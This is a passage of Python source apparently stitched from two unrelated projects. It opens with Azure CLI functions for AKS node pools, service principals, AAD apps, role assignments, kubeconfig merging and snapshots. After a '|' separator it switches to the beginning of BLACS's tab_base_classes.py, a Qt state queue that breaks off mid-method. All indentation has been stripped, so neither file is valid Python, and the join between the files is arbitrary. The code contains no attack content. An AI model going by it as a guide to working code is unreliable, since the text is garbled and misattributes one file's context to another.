allow_appending_values_to_same_key=True,
)
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
headers=aks_custom_headers,
)
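# Illustrative usage (assumed example):
#   az aks nodepool update -g my-rg --cluster-name my-cluster -n np1 \
#       --enable-cluster-autoscaler --min-count 1 --max-count 5
# At most one of the three autoscaler flags may be given; if none is, at least one of
# --tags/--mode/--max-surge/--scale-down-mode/--labels/--node-taints must be supplied.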
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_get_upgrade_profile(cmd, client, resource_group_name, cluster_name, nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def _ensure_aks_acr_role_assignment(cmd,
assignee,
registry_id,
detach=False,
is_service_principal=True):
if detach:
if not _delete_role_assignments(cmd.cli_ctx,
'acrpull',
assignee,
scope=registry_id,
is_service_principal=is_service_principal):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cmd,
'acrpull',
assignee,
scope=registry_id,
is_service_principal=is_service_principal):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
aad_session_key = None
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal, aad_session_key = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specified, validate that --client-secret was provided too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
'aad_session_key': aad_session_key,
}
def _ensure_osa_aad(cmd,
cli_ctx,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
identifier=None,
name=None, create=False,
customer_admin_group_id=None):
OpenShiftManagedClusterAADIdentityProvider = cmd.get_models('OpenShiftManagedClusterAADIdentityProvider',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
rbac_client = get_graph_rbac_management_client(cli_ctx)
if create:
# This reply_url is temporarily set since Azure needs one to create the AAD application.
app_id_name = 'https://{}'.format(name)
if not aad_client_app_secret:
aad_client_app_secret = _create_client_secret()
# Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
additional_properties=None, type="Scope")
# Read directory permissions on Windows Azure Active Directory API
directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
additional_properties=None, type="Role")
required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
additional_properties=None,
resource_app_id="00000002-0000-0000-c000-000000000000")
list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
.format(app_id_name)))
if list_aad_filtered:
aad_client_app_id = list_aad_filtered[0].app_id
# Updating reply_url with the correct FQDN information returned by the RP
reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(
identifier)
update_application(client=rbac_client.applications,
object_id=list_aad_filtered[0].object_id,
display_name=name,
identifier_uris=[app_id_name],
reply_urls=[reply_url],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
logger.info('Updated AAD: %s', aad_client_app_id)
else:
result, _aad_session_key = create_application(client=rbac_client.applications,
display_name=name,
identifier_uris=[
app_id_name],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
aad_client_app_id = result.app_id
logger.info('Created an AAD: %s', aad_client_app_id)
# Get the TenantID
if aad_tenant_id is None:
profile = Profile(cli_ctx=cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
return OpenShiftManagedClusterAADIdentityProvider(
client_id=aad_client_app_id,
secret=aad_client_app_secret,
tenant_id=aad_tenant_id,
kind='AADIdentityProvider',
customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
service_principal, _aad_session_key = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# add the role assignment before saving it
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
# --service-principal specified, validate that --client-secret was provided too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
}
def _create_client_secret():
# Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Do the get; it errors out if the group doesn't exist, and we only need the location from the result.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError(
'Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
'min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _validate_autoscaler_update_counts(min_count, max_count, is_enable_or_update):
"""
Validates the min, max, and node count when performing an update
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'Value of min-count should be less than or equal to value of max-count.')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
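# Illustrative behaviour (assumed example): `az aks get-credentials -f -` passes path="-"
# and prints the kubeconfig to stdout, while a real path is merged into the existing
# kubeconfig file, which is created with 0600 permissions if it does not yet exist.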
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
ap_master_attrs = ['name', 'os_type']
net_attrs = ['peer_vnet_id']
for managed_cluster in managed_clusters:
for attr in attrs:
if hasattr(managed_cluster, attr) and getattr(managed_cluster, attr) is None:
delattr(managed_cluster, attr)
for attr in ap_master_attrs:
if getattr(managed_cluster.master_pool_profile, attr, None) is None:
delattr(managed_cluster.master_pool_profile, attr)
for attr in net_attrs:
if getattr(managed_cluster.network_profile, attr, None) is None:
delattr(managed_cluster.network_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
"northcentralus",
"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_osa_nulls(list(managed_clusters))
def _format_workspace_id(workspace_id):
workspace_id = workspace_id.strip()
if not workspace_id.startswith('/'):
workspace_id = '/' + workspace_id
if workspace_id.endswith('/'):
workspace_id = workspace_id.rstrip('/')
return workspace_id
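# Minimal behaviour sketch (illustrative, doctest-style; not executed):
#   _format_workspace_id(' subscriptions/<sub>/resourceGroups/<rg>/providers/'
#                        'Microsoft.OperationalInsights/workspaces/<ws>/ ')
# returns the same ID stripped of surrounding whitespace, with a single leading '/'
# added and the trailing '/' removed.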
def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals
location=None,
compute_vm_size="Standard_D4s_v3",
compute_count=3,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
vnet_prefix="10.0.0.0/8",
subnet_prefix="10.0.0.0/24",
vnet_peer=None,
tags=None,
no_wait=False,
workspace_id=None,
customer_admin_group_id=None):
OpenShiftManagedClusterAgentPoolProfile = cmd.get_models('OpenShiftManagedClusterAgentPoolProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftAgentPoolProfileRole = cmd.get_models('OpenShiftAgentPoolProfileRole',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterIdentityProvider = cmd.get_models('OpenShiftManagedClusterIdentityProvider',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedCluster = cmd.get_models('OpenShiftManagedCluster',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftRouterProfile = cmd.get_models('OpenShiftRouterProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
NetworkProfile = cmd.get_models('NetworkProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterAuthProfile = cmd.get_models('OpenShiftManagedClusterAuthProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('Support for the creation of ARO 3.11 clusters ends 30 Nov 2020. Please see aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
if location is None:
location = get_rg_location(cmd.cli_ctx, resource_group_name)
agent_pool_profiles = []
agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='compute', # Must be 12 chars or less before ACS RP adds to it
count=int(compute_count),
vm_size=compute_vm_size,
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.compute,
subnet_cidr=subnet_prefix
)
agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='infra', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.infra,
subnet_cidr=subnet_prefix
)
agent_pool_profiles.append(agent_node_pool_profile)
agent_pool_profiles.append(agent_infra_pool_profile)
agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='master', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
subnet_cidr=subnet_prefix
)
identity_providers = []
create_aad = False
# Validate that the cluster does not already exist, since AAD rotation is not supported on OSA for now
try:
client.get(resource_group_name, name)
except CloudError:
# Validate whether aad_client_app_id, aad_client_app_secret and aad_tenant_id are set
if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
create_aad = True
osa_aad_identity = _ensure_osa_aad(cmd,
cmd.cli_ctx,
aad_client_app_id=aad_client_app_id,
aad_client_app_secret=aad_client_app_secret,
aad_tenant_id=aad_tenant_id, identifier=None,
name=name, create=create_aad,
customer_admin_group_id=customer_admin_group_id)
identity_providers.append(
OpenShiftManagedClusterIdentityProvider(
name='Azure AD',
provider=osa_aad_identity
)
)
auth_profile = OpenShiftManagedClusterAuthProfile(
identity_providers=identity_providers)
default_router_profile = OpenShiftRouterProfile(name='default')
if vnet_peer is not None:
from msrestazure.tools import is_valid_resource_id, resource_id
if not is_valid_resource_id(vnet_peer):
vnet_peer = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network', type='virtualNetwork',
name=vnet_peer
)
if workspace_id is not None:
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
else:
monitor_profile = None
network_profile = NetworkProfile(
vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer)
osamc = OpenShiftManagedCluster(
location=location, tags=tags,
open_shift_version="v3.11",
network_profile=network_profile,
auth_profile=auth_profile,
agent_pool_profiles=agent_pool_profiles,
master_pool_profile=agent_master_pool_profile,
router_profiles=[default_router_profile],
monitor_profile=monitor_profile)
try:
# long_running_operation_timeout=300
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
result = LongRunningOperation(cmd.cli_ctx)(result)
instance = client.get(resource_group_name, name)
_ensure_osa_aad(cmd,
cmd.cli_ctx,
aad_client_app_id=osa_aad_identity.client_id,
aad_client_app_secret=osa_aad_identity.secret,
aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
name=name, create=create_aad)
except CloudError as ex:
if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
raise CLIError(
'Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
if "No registered resource provider found for location" in ex.message:
raise CLIError(
'Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
raise ex
def openshift_show(cmd, client, resource_group_name, name):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
mc = client.get(resource_group_name, name)
return _remove_osa_nulls([mc])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
idx = 0
for i in range(len(instance.agent_pool_profiles)):
if instance.agent_pool_profiles[i].name.lower() == "compute":
idx = i
break
instance.agent_pool_profiles[idx].count = int(
compute_count) # pylint: disable=no-member
# null out the AAD profile and manually set the master agent pool name, because otherwise validation complains
instance.master_pool_profile.name = "master"
instance.auth_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False):
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False):
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=False, workspace_resource_id=None) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
# some addons require a role assignment after cluster creation
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
poller = client.begin_create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
# Grant vnet permission to the system-assigned identity RIGHT AFTER
# the cluster is PUT; doing this here reduces the latency before the
# role assignment takes effect
if need_grant_vnet_permission_to_cluster_identity:
instant_cluster = client.get(resource_group_name, name)
if not _add_role_assignment(cmd, 'Network Contributor',
instant_cluster.identity.principal_id, scope=vnet_subnet_id,
is_service_principal=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(poller)
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
'the ACR to it. You can manually grant permission to the identity '
'named <CLUSTER_NAME>-agentpool in the MC_ resource group to give '
'it permission to pull from ACR.')
else:
kubelet_identity_object_id = cluster.identity_profile["kubeletidentity"].object_id
_ensure_aks_acr(cmd,
assignee=kubelet_identity_object_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id,
is_service_principal=False)
else:
cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
return cluster
def _ensure_cluster_identity_permission_on_kubelet_identity(cmd, cluster_identity_object_id, scope):
factory = get_auth_management_client(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not _add_role_assignment(cmd, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise UnauthorizedError('Could not grant Managed Identity Operator '
'permission to cluster identity at scope {}'.format(scope))
def aks_snapshot_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
nodepool_id,
location=None,
tags=None,
aks_custom_headers=None,
no_wait=False):
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# load model CreationData, Snapshot
from azure.cli.command_modules.acs.decorator import AKSModels
CreationData = AKSModels(cmd, ResourceType.MGMT_CONTAINERSERVICE).CreationData
Snapshot = AKSModels(cmd, ResourceType.MGMT_CONTAINERSERVICE).Snapshot
creationData = CreationData(
source_resource_id=nodepool_id
)
snapshot = Snapshot(
name=name,
tags=tags,
location=location,
creation_data=creationData
)
# custom headers
aks_custom_headers = extract_comma_separated_string(
aks_custom_headers,
enable_strip=True,
extract_kv=True,
default_value={},
allow_appending_values_to_same_key=True,
)
return client.create_or_update(resource_group_name, name, snapshot, headers=aks_custom_headers)
def aks_snapshot_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
snapshot = client.get(resource_group_name, name)
return snapshot
def aks_snapshot_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
no_wait=False,
yes=False):
msg = 'This will delete the snapshot "{}" in resource group "{}", Are you sure?'.format(name, resource_group_name)
if not yes and not prompt_y_n(msg, default="n"):
return None
return client.delete(resource_group_name, name)
def aks_snapshot_list(cmd, client, resource_group_name=None): # pylint: disable=unused-argument
if resource_group_name is None or resource_group_name == '':
return client.list()
return client.list_by_resource_group(resource_group_name)
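# Illustrative snapshot workflow (assumed examples; flag names per the matching CLI version):
#   az aks snapshot create -g my-rg -n my-snapshot --nodepool-id <agent-pool-resource-id>
#   az aks nodepool add -g my-rg --cluster-name my-cluster -n np2 --snapshot-id <snapshot-resource-id>
# aks_agentpool_add/aks_agentpool_upgrade above fall back to the snapshot's kubernetes_version,
# os_type, os_sku and vm_size when those arguments are omitted.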
|
tab_base_classes.py
|
#####################################################################
# #
# /tab_base_classes.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program BLACS, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from zprocess import Process
from Queue import Queue as Queue
import time
import sys
import threading
import cPickle
import traceback
import logging
import cgi
import os
from types import GeneratorType
import zprocess
#import labscript_utils.excepthook
if 'PySide' in sys.modules.copy():
from PySide.QtCore import *
from PySide.QtGui import *
else:
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qtutils import *
class Counter(object):
"""A class with a single method that
returns a different integer each time it's called."""
def __init__(self):
self.i = 0
def get(self):
self.i += 1
return self.i
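# Minimal usage sketch (illustrative):
#   c = Counter()
#   c.get()  # -> 1
#   c.get()  # -> 2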
MODE_MANUAL = 1
MODE_TRANSITION_TO_BUFFERED = 2
MODE_TRANSITION_TO_MANUAL = 4
MODE_BUFFERED = 8
class StateQueue(object):
# NOTE:
#
# It is theoretically possible to remove the dependency on the Qt Mainloop (remove inmain decorators and function calls)
# by introducing a local lock object instead. However, be aware that right now, the Qt inmain lock is preventing the
# state machine loop (Tab.mainloop) from getting any states out of the queue until after the entire tab is initialised
# and the Qt mainloop starts.
#
# This is particularly important because we exploit this behaviour to make sure that Tab._initialise_worker is placed at the
# start of the StateQueue, and so the Tab.mainloop method is guaranteed to get this initialisation method as the first state
# regardless of whether the mainloop is started before the state is inserted (the state should always be inserted as part of
# the call to Tab.create_worker, in DeviceTab.initialise_workers in DeviceTab.__init__ )
#
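    # A rough sketch of the intended interplay (illustrative only, not executed here;
    # `some_statefunction` is a placeholder for any method decorated with @define_state):
    #
    #   queue = StateQueue('my_device')
    #   # GUI thread: queue up a state allowed in manual or buffered mode
    #   queue.put(MODE_MANUAL|MODE_BUFFERED, True, False, [some_statefunction, [(), {}]])
    #   # state machine thread (Tab.mainloop): blocks until a queued state is allowed in the current mode
    #   data = queue.get(MODE_MANUAL)   # -> [some_statefunction, [(), {}]]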
def __init__(self,device_name):
self.logger = logging.getLogger('BLACS.%s.state_queue'%(device_name))
self.logging_enabled = False
if self.logging_enabled:
self.logger.debug("started")
self.list_of_states = []
self._last_requested_state = None
# A queue that blocks the get(requested_state) method until an entry in the queue has a state that matches the requested_state
self.get_blocking_queue = Queue()
@property
@inmain_decorator(True)
# This is always done in main so that we avoid a race condition between the get method and
# the put method accessing this property
def last_requested_state(self):
return self._last_requested_state
@last_requested_state.setter
@inmain_decorator(True)
def last_requested_state(self, value):
self._last_requested_state = value
def log_current_states(self):
if self.logging_enabled:
self.logger.debug('Current items in the state queue: %s'%str(self.list_of_states))
# this should only happen in the main thread, as my implementation is not thread safe!
@inmain_decorator(True)
def put(self,allowed_states,queue_state_indefinitely,delete_stale_states,data,prepend=False):
if prepend:
self.list_of_states.insert(0,[allowed_states,queue_state_indefinitely,delete_stale_states,data])
else:
self.list_of_states.append([allowed_states,queue_state_indefinitely,delete_stale_states,data])
# if this state is one the get command is waiting for, notify it!
if self.last_requested_state is not None and allowed_states&self.last_requested_state:
self.get_blocking_queue.put('new item')
if self.logging_enabled:
if not isinstance(data[0],str):
self.logger.debug('New state queued up. Allowed modes: %d, queue state indefinitely: %s, delete stale states: %s, function: %s'%(allowed_states,str(queue_state_indefinitely),str(delete_stale_states),data[0].__name__))
self.log_current_states()
# this should only happen in the main thread, as my implementation is not thread safe!
@inmain_decorator(True)
def check_for_next_item(self,state):
        # We reset the queue here, as we are about to traverse the list of states, which already covers any new
        # items that are described by messages in this queue, so let's not keep those messages around anymore.
        # Put another way, if we don't find an item in this function we want to block until a new item is added,
        # so it's best if the queue is empty now!
if self.logging_enabled:
            self.logger.debug('Re-initialising self.get_blocking_queue')
self.get_blocking_queue = Queue()
# traverse the list
delete_index_list = []
success = False
for i,item in enumerate(self.list_of_states):
allowed_states,queue_state_indefinitely,delete_stale_states,data = item
if self.logging_enabled:
self.logger.debug('iterating over states in queue')
if allowed_states&state:
# We have found one! Remove it from the list
delete_index_list.append(i)
if self.logging_enabled:
self.logger.debug('requested state found in queue')
# If we are to delete stale states, see if the next state is the same statefunction.
# If it is, use that one, or whichever is the latest entry without encountering a different statefunction,
# and delete the rest
if delete_stale_states:
state_function = data[0]
i+=1
while i < len(self.list_of_states) and state_function == self.list_of_states[i][3][0]:
if self.logging_enabled:
self.logger.debug('requesting deletion of stale state')
allowed_states,queue_state_indefinitely,delete_stale_states,data = self.list_of_states[i]
delete_index_list.append(i)
i+=1
success = True
break
elif not queue_state_indefinitely:
if self.logging_enabled:
self.logger.debug('state should not be queued indefinitely')
delete_index_list.append(i)
# do this in reverse order so that the first delete operation doesn't mess up the indices of subsequent ones
for index in reversed(sorted(delete_index_list)):
if self.logging_enabled:
self.logger.debug('deleting state')
del self.list_of_states[index]
if not success:
data = None
return success,data
# this method should not be called in the main thread, because it will block until something is found...
# Please, only have one thread ever accessing this...I have no idea how it will behave if multiple threads are trying to get
# items from the queue...
#
    # This method will block until an item in the queue is found to be allowed during the specified 'state'.
def get(self,state):
if self.last_requested_state:
raise Exception('You have multiple threads trying to get from this queue at the same time. I won\'t allow it!')
self.last_requested_state = state
while True:
if self.logging_enabled:
self.logger.debug('requesting next item in queue with mode %d'%state)
inmain(self.log_current_states)
status,data = self.check_for_next_item(state)
if not status:
# we didn't find anything useful, so we'll wait until a useful state is added!
self.get_blocking_queue.get()
else:
